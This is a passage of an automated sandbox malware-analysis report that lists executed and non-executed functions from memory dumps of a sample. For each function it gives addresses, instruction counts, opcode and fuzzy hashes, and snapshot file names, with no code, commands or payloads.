                              Function 00007FFD9BADE62A Relevance: .0, Instructions: 23COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                              • Instruction ID: 8e233fc25587696708e9e2ab1b081aef437669b4872b14cf0b460aba26942c5f
                              • Opcode Fuzzy Hash: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                              • Instruction Fuzzy Hash: 74D06222B5F91D49ED786384B8232FC7291EBC5631B531277E14E814A29C9925151185
                              Function 00007FFD9BAE661D Relevance: .0, Instructions: 23COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1ff1d7bb294560a33adac2afba5c03a4d1fd815d0b067b69062a33a0c0f14e3a
                              • Instruction ID: f9d73e03278d48688c17c4a1207327c781293d005570ecfb1a49aab72280b7e2
                              • Opcode Fuzzy Hash: 1ff1d7bb294560a33adac2afba5c03a4d1fd815d0b067b69062a33a0c0f14e3a
                              • Instruction Fuzzy Hash: 46D02B12F0180E0DEB54B3B43C2A5FDF245EFC8218BC10431E01DC31D7DD6915114181
                              Function 00007FFD9BB0B310 Relevance: .0, Instructions: 22COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: db1d85f38c52b1d99da28fa096a8bbbedea5f97d3afb57e999b55014f5bf4a05
                              • Instruction ID: 61eb8acec06bb8e25eedc01145384c3519fe1a2d8c6b84e3aed109223dff7eb7
                              • Opcode Fuzzy Hash: db1d85f38c52b1d99da28fa096a8bbbedea5f97d3afb57e999b55014f5bf4a05
                              • Instruction Fuzzy Hash: 79D01221E28E1D4BDBB8FB7850557B6B1E0FF18318F410A69D05AC35C9DF68AE854384
                              Function 00007FFD9BB002F0 Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f94574517017f2bc6fb2aa60c78e6c29992320d7d0204074f89d6cc7041b0121
                              • Instruction ID: 1a899354cbe33e8b1c9761151a29f1c696f9caeebdf54236614c3a0e847161e1
                              • Opcode Fuzzy Hash: f94574517017f2bc6fb2aa60c78e6c29992320d7d0204074f89d6cc7041b0121
                              • Instruction Fuzzy Hash: FBD05E61B22E0D4BF74CA77A0C9D26536D3EBDC605F858179A408C22E6ED78A9924748
                              Function 00007FFD9BAE2E0A Relevance: .0, Instructions: 20COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f38d0ce35c557be7dd6a436a94e76bb62aa08376fca2af48155e977f916ac58a
                              • Instruction ID: d08f665407979bd157e67bd064c4fa4e9e1b8ed7082879ebf3682f8127a66d7b
                              • Opcode Fuzzy Hash: f38d0ce35c557be7dd6a436a94e76bb62aa08376fca2af48155e977f916ac58a
                              • Instruction Fuzzy Hash: E5D02B62E4F2560BE762D65C74E0499B7C08B10750F4001B9C08486096D85C514AC651
                              Function 00007FFD9BAE539A Relevance: .0, Instructions: 17COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1e4439172462762177387768cb6deefa197d9f9bfcb600c2d7b2edae2388f87b
                              • Instruction ID: cf129d06e007e8d0bd3675c10cf242ebfecd257b4f9f2f43a06b5ba0c41a50cf
                              • Opcode Fuzzy Hash: 1e4439172462762177387768cb6deefa197d9f9bfcb600c2d7b2edae2388f87b
                              • Instruction Fuzzy Hash: F1C0801374D90E05FAB1E68CF4615E9F3C1DB507A1F510272D084C01A7EC8967474381
                              Function 00007FFD9BAD08FE Relevance: .0, Instructions: 17COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5d41e437983518334ba4f86bdba3c0eed54524584d1071d92576d05defbf8e79
                              • Instruction ID: e51e54dc2fd4269aa4f31674f600d9606b7de50e3e9fa7623c4e585c7ffeaf93
                              • Opcode Fuzzy Hash: 5d41e437983518334ba4f86bdba3c0eed54524584d1071d92576d05defbf8e79
                              • Instruction Fuzzy Hash: 7FD0127251CB094BC3149B54E4508DAB7A0FB84364F440B39E0AA912E5DB689381C686
                              Function 00007FFD9BAD0C57 Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a37279a9e4a0aa64f27d26e54b123e9ceded54e91e237c97a0a0c78415ab6f7b
                              • Instruction ID: 10760e95994aef8b6f085d644932dbd8ebf5e3eac3512b3ff2114085e919bbd3
                              • Opcode Fuzzy Hash: a37279a9e4a0aa64f27d26e54b123e9ceded54e91e237c97a0a0c78415ab6f7b
                              • Instruction Fuzzy Hash: 6DD05E3192CB094BD354DF14E4508DAB7A0FFC4720F840B2DF0AE862E5EEB4D282C686
                              Function 00007FFD9BAEC03A Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 46cfca83629c8835618dc03c3a20ad405c0c92c5caef1e3222e5d33789e6e066
                              • Instruction ID: cd53a0cebf95c851bb8e89d0d1a0f33ee959b201d49b8a69a53fce9e5029f73a
                              • Opcode Fuzzy Hash: 46cfca83629c8835618dc03c3a20ad405c0c92c5caef1e3222e5d33789e6e066
                              • Instruction Fuzzy Hash: 27C0803375D60E06EAE5934CF0D56E6B3C0D750250F950172D044C11D7EC4D75875380
                              Function 00007FFD9BAE4610 Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f81b0d5ec6bbcdc92bfc1ed63ac81ef3694b23700a24cc0943b5fc754b8c8ada
                              • Instruction ID: 634817136201ba6c1ae0f6f1dd12376ffef5573a934a29be15ce76f4588cad62
                              • Opcode Fuzzy Hash: f81b0d5ec6bbcdc92bfc1ed63ac81ef3694b23700a24cc0943b5fc754b8c8ada
                              • Instruction Fuzzy Hash: BFD0A922B0D40E47EB205B8CA4A00E8B380AFB0310F4201B4E08C960AADEE83A828280
                              Function 00007FFD9BAE9E2A Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6b26aa93847fe150453eb0f068ad9163b7047a756ab7b53085609233fcd73493
                              • Instruction ID: 5ffd341d823888de2c489e0c9b9139b4379b559aa88a97922b5d4a6b3dde7683
                              • Opcode Fuzzy Hash: 6b26aa93847fe150453eb0f068ad9163b7047a756ab7b53085609233fcd73493
                              • Instruction Fuzzy Hash: 67C0C02370EB1D03EFA0D34CF0402DEB3C0CB443A0F800172D084C00ADDE9A55838280
                              Function 00007FFD9BAE722A Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fe26b11fcb36ac287e02040090526c775c6657893640264e3ea706fb83b69999
                              • Instruction ID: 5d760f6b06f33f6169a035f19dbec486fa7377a1dde35a84e9f76859e472c12f
                              • Opcode Fuzzy Hash: fe26b11fcb36ac287e02040090526c775c6657893640264e3ea706fb83b69999
                              • Instruction Fuzzy Hash: 67C02222A0D90A42EAE09748F8211E6B3C0EB402A0FA00071E04880091DF6A66528280
                              Function 00007FFD9BAE617A Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c4ef60a3f142c0a28a0333bc45e34125bbb60aebbb7c7fe84b94706babdbcb65
                              • Instruction ID: 6fbd9669900479ea5cdc88b636a6b9b7be7ee508e46ef912fc9db879dec3b2ee
                              • Opcode Fuzzy Hash: c4ef60a3f142c0a28a0333bc45e34125bbb60aebbb7c7fe84b94706babdbcb65
                              • Instruction Fuzzy Hash: 35C02223D0870A0ADAA0DB0CB4015DAB3C0E740240FC10072E018930A2FD48664A8781
                              Function 00007FFD9BAE73E4 Relevance: .0, Instructions: 14COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6aec6070f675a79a7fa84f67455005a6ad5133222aade14e68b0e3209bfd0d38
                              • Instruction ID: b40b581c46cf4002067d4a68cbe22f7c73a84039bde0f315ad81d1b57c77727c
                              • Opcode Fuzzy Hash: 6aec6070f675a79a7fa84f67455005a6ad5133222aade14e68b0e3209bfd0d38
                              • Instruction Fuzzy Hash: EEC04C11B1D93E06E660569C7C511A8A28197945207651677D40AC1299D859598111D2
                              Function 00007FFD9BAE73D4 Relevance: .0, Instructions: 14COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fa8b65b3006ea8202ffe90280ca68a1306d14b8a65b926797a371e1ea15915b3
                              • Instruction ID: 2c54de1195d568e828d47a7b474d6fcd6699a264983af2dca5a31b41e16f0bbf
                              • Opcode Fuzzy Hash: fa8b65b3006ea8202ffe90280ca68a1306d14b8a65b926797a371e1ea15915b3
                              • Instruction Fuzzy Hash: EBC09B11F1D93E06E57056DC7C511BCA381D7D45707A51777D40FC129DDC5D5D4111D2
                              Function 00007FFD9BAE73C4 Relevance: .0, Instructions: 14COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2c5d238561132fdab085688497e784428c09be716237a35d6f48b84b19564719
                              • Instruction ID: 12f1f979288c1c7ff90ed4e88ccd824a83c8cca418ead8408872d355269f431c
                              • Opcode Fuzzy Hash: 2c5d238561132fdab085688497e784428c09be716237a35d6f48b84b19564719
                              • Instruction Fuzzy Hash: 29C09B11F1E93E06E670569C7C611B8A381D7C45317651777D40EC129DDC9D5DD111C2
                              Function 00007FFD9BAD3F43 Relevance: .0, Instructions: 13COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc829645f89fd517edc5882a4a9122e5814abbe719e6d66802dc693986b6723a
                              • Instruction ID: 3cdfab8557d9cbab5632bf3b18493a0e886317d3725ee41b56fc9d8fb19c593d
                              • Opcode Fuzzy Hash: fc829645f89fd517edc5882a4a9122e5814abbe719e6d66802dc693986b6723a
                              • Instruction Fuzzy Hash: 69C0123252D64957D345A740E4518EB7351BFD0200F801F39F05A4109DDD5966458583
                              Function 00007FFD9BAE7520 Relevance: .0, Instructions: 13COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ef7054e3d1ea0e2e9a01662d0d2a598c51c37546175fc44bd07dd953fca81d90
                              • Instruction ID: 8e618836ab21aacbdc1fc135c2c6c174e6ae0bf0ef2bf0e8ff8ca5f3dfa72c26
                              • Opcode Fuzzy Hash: ef7054e3d1ea0e2e9a01662d0d2a598c51c37546175fc44bd07dd953fca81d90
                              • Instruction Fuzzy Hash: 29C09221B1AC2C1A47B8A22D1859A7A14DACBED62171A42ABA40CD32A9DDA44C4643D1
                              Function 00007FFD9BAE3CCA Relevance: .0, Instructions: 13COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 24f1cca51add04ce72aea0eb7bd34eed35ebbd9096a9ca4a8fa764f20159e548
                              • Instruction ID: 56a79bada3a820c90ae7dfe0a52bc210c6c454210e5662da5f0346f65b01de93
                              • Opcode Fuzzy Hash: 24f1cca51add04ce72aea0eb7bd34eed35ebbd9096a9ca4a8fa764f20159e548
                              • Instruction Fuzzy Hash: B3C08013E5D60A15EFB58348B0D55B913D0D790350F950176B055C01E6EC4991874541
                              Function 00007FFD9BAE7AC0 Relevance: .0, Instructions: 10COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 60a62728fc690bda5e4c212fd73d19d2d72a15c2183dc9853c89fda1982ca33b
                              • Instruction ID: 8b044eb3f17268000a7fc6891e40c4e6952fb134262485b7e2bdd4f0b8d53eb4
                              • Opcode Fuzzy Hash: 60a62728fc690bda5e4c212fd73d19d2d72a15c2183dc9853c89fda1982ca33b
                              • Instruction Fuzzy Hash: 4DB09227B4A50EC5EA3012C879120FDB390DB80276F121233D30D91452899A22664181
                              Function 00007FFD9BAE3F80 Relevance: .0, Instructions: 10COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 71d287cf2a69af2f615b93d9a5baa796d5cb81f382d0b65fd70d02e3aaec6be8
                              • Instruction ID: 1b7c1ffd341fe88f9962cb31fce54cb5380bbce79d21dad44c5123a0c3ddc668
                              • Opcode Fuzzy Hash: 71d287cf2a69af2f615b93d9a5baa796d5cb81f382d0b65fd70d02e3aaec6be8
                              • Instruction Fuzzy Hash: C4B09237B4A00E85EA3122C674220FDB318EB802B6F52027BE20D810618D8722254191
                              Function 00007FFD9BAD8243 Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: da2bdc384ec007012a236b9633edbef1f0c769441daa823e4bd76c50011e60c6
                              • Instruction ID: d0c34a51238ea3d0ecee6e1970a27612f376363b10dbe34ec8d911fe84e05892
                              • Opcode Fuzzy Hash: da2bdc384ec007012a236b9633edbef1f0c769441daa823e4bd76c50011e60c6
                              • Instruction Fuzzy Hash: D9B01233F4041985EF0469C8B4012EDB314DB80365F001573E23CC10829956142401D1
                              Function 00007FFD9BAE6900 Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 31c6f5a480554e8d6fba1952b767324e6b35a37b521423bfc3c091d68fb2f836
                              • Instruction ID: d1b0d667bff44b09ec7da80db3f7ea48559e055545f60572be7a65140aef2141
                              • Opcode Fuzzy Hash: 31c6f5a480554e8d6fba1952b767324e6b35a37b521423bfc3c091d68fb2f836
                              • Instruction Fuzzy Hash: EBC09231929B1849E350BB34894E4ABBAE0DFA8299F040F3BAC49D1079FD60968446D2
                              Function 00007FFD9BAE1618 Relevance: .0, Instructions: 1COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 67a8537ef7a78c6baaa35df4087cde2becdf2800a1bbc0ae2ea82b62d591aa64
                              • Instruction ID: 5c3d0b4b72592d2549601487858126e9f7128f7e22eaed586d96c3f58edb9f4e
                              • Opcode Fuzzy Hash: 67a8537ef7a78c6baaa35df4087cde2becdf2800a1bbc0ae2ea82b62d591aa64
                              • Instruction Fuzzy Hash:
                              Function 00007FFD9BAE15F0 Relevance: .0, Instructions: 1COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2806d0cdf2f89e587b1780457a1afe18073251eac7b753b99814b476ab0e528f
                              • Instruction ID: 27eff6eb79ded2cf5cd6027ff626ea2aace502ecf80eb7e77908edb283471150
                              • Opcode Fuzzy Hash: 2806d0cdf2f89e587b1780457a1afe18073251eac7b753b99814b476ab0e528f
                              • Instruction Fuzzy Hash:
                              Function 00007FFD9BAE1628 Relevance: .0, Instructions: 1COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f09a29de5b4551ce8d1c4c4bcef2128230de4381bfa0a1101002c5d448752d56
                              • Instruction ID: 680b26d615a9ecbd320d42e6fac9e574bae2a1d602307e36f5cca7a4b7a9af0d
                              • Opcode Fuzzy Hash: f09a29de5b4551ce8d1c4c4bcef2128230de4381bfa0a1101002c5d448752d56
                              • Instruction Fuzzy Hash:
                              Function 00007FFD9BAE1598 Relevance: .0, Instructions: 1COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 75177751bbdf7ad8f88f71baad76fc35ad4ecb6dc0368d34e59d7da5ec94666f
                              • Instruction ID: 212f3a889909e4e0749e6c111694895feff7091c5493d478d937f4b2cad415ef
                              • Opcode Fuzzy Hash: 75177751bbdf7ad8f88f71baad76fc35ad4ecb6dc0368d34e59d7da5ec94666f
                              • Instruction Fuzzy Hash:

                              Non-executed Functions

                              Function 00007FFD9BADF088 Relevance: 1.9, Strings: 1, Instructions: 636COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: _"q/
                              • API String ID: 0-336996232
                              • Opcode ID: fa6d3c610c44346945e9296f34e5d6f45ab5a843a2e6ba1df3d0c8f3995cff0c
                              • Instruction ID: 293213425104b8dbc547c183b9826c7d96d470594d1664a8a5d149c98a4cb1dd
                              • Opcode Fuzzy Hash: fa6d3c610c44346945e9296f34e5d6f45ab5a843a2e6ba1df3d0c8f3995cff0c
                              • Instruction Fuzzy Hash: 1822F671B09A4E8FDB98DF68C4A56A977E1FF69310B1141BED009C72E6DE74AC42CB40
                              Function 00007FFD9BC9BE32 Relevance: 1.8, Strings: 1, Instructions: 551COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: d/q
                              • API String ID: 0-4223035929
                              • Opcode ID: fc315a84e363e3fca8090adae91b616efbe3422f2dd7bf91e0ead411538a5b4c
                              • Instruction ID: 8aefd50ab16c3dc5e0dcce15b2e842423ebc9aa55eee08f343a4bb6bf71267d5
                              • Opcode Fuzzy Hash: fc315a84e363e3fca8090adae91b616efbe3422f2dd7bf91e0ead411538a5b4c
                              • Instruction Fuzzy Hash: 4302E731A0AA4D4FEB98DFA888647EE77D1FF49315F1501B9D41EC71E6CA35A902C740
                              Function 00007FFD9BAE1CB6 Relevance: 1.6, Strings: 1, Instructions: 378COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: _"q/
                              • API String ID: 0-336996232
                              • Opcode ID: b63a5458cf75c2f05d32de8a92194a6a18ab8981a45e3c3b40ad34d2631269ee
                              • Instruction ID: b95556616f78a768dc3dabc846154607468cef5cf961f53fbbd59704887b5ac4
                              • Opcode Fuzzy Hash: b63a5458cf75c2f05d32de8a92194a6a18ab8981a45e3c3b40ad34d2631269ee
                              • Instruction Fuzzy Hash: F2C12771B0EA598FD798DB7C84A56A877E2FF69350B0541BED009CB2E3DE696C02C740
                              Function 00007FFD9BC92438 Relevance: .3, Instructions: 296COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ef7cb3c32048ce0beb8ef32a124785ecf080dc9238f8b5d1568c232ddd9437fb
                              • Instruction ID: a758aacc3b52b0ca33271e483130f98dfce37201fcc084a729ff821fd9ecbf52
                              • Opcode Fuzzy Hash: ef7cb3c32048ce0beb8ef32a124785ecf080dc9238f8b5d1568c232ddd9437fb
                              • Instruction Fuzzy Hash: BD914712A0E7CA1BE329A6BC58754E83F909F1A33971902FBE4DDCE1EBDC186945C341
                              Function 00007FFD9BC93060 Relevance: .2, Instructions: 234COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e2ce14a1879abb38a14eaef9893e1fb1bec1bf7ea186f4a225d5a990fd6d7573
                              • Instruction ID: fc88f9a9b9ba02999ef8d3b8a2317c1d7ac3db5e0e69fc49ecc86e080f1c549e
                              • Opcode Fuzzy Hash: e2ce14a1879abb38a14eaef9893e1fb1bec1bf7ea186f4a225d5a990fd6d7573
                              • Instruction Fuzzy Hash: F381B453A0FBC61BF37286B848351A97F526F9229471E00FBD0D44B5BFEA19BA04C385
                              Function 00007FFD9BC967C5 Relevance: .2, Instructions: 168COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2382261650.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bc90000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b4f2c86791f548c60557f404df34c15814493b83ee60ccbf3dca8833877d1dca
                              • Instruction ID: ec90ad517b2381a407e85fb5bd762c5c1b06fdf24d923f80aed01b99a3a6578f
                              • Opcode Fuzzy Hash: b4f2c86791f548c60557f404df34c15814493b83ee60ccbf3dca8833877d1dca
